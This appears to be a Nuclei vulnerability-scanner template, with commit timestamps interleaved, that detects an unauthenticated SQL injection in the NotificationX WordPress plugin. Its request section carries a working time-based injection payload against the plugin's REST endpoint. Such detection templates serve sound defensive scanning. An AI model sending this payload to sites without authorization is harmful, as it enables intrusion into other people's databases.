2023-07-07 09:38:49 +00:00
id : notificationx-sqli
info :
name : NotificationX < 2.3.12 - SQL Injection
author : theamanrawat
severity : high
description : |
The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
2023-10-14 11:27:55 +00:00
remediation : Fixed in version 2.3.12
2023-07-07 09:38:49 +00:00
reference :
- https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
- https://wordpress.org/plugins/notificationx/
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2024-10-15 10:27:37 +00:00
tags : time-based-sqli,wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection
2023-07-07 09:38:49 +00:00
http :
- raw :
- |
GET /wp-json/ HTTP/1.1
Host : {{Hostname}}
- |
@timeout : 10s
GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 401'
- 'contains(content_type, "application/json")'
- 'contains(body, "There is no notification created with this id")'
condition : and
extractors :
- type : regex
name : apikey
group : 1
regex :
- '"home":"(.*?)",'
internal : true
2024-10-18 13:05:19 +00:00
# digest: 4b0a00483046022100897653af7da25aea88607c6100e0ef56eca7afbe99cff93a784777ecce59f730022100b1208efe060f0b26abfe9bd8e6402bb24639730479617dc8764996925f181e6e:922c64590222798bb761d5b6d8e72950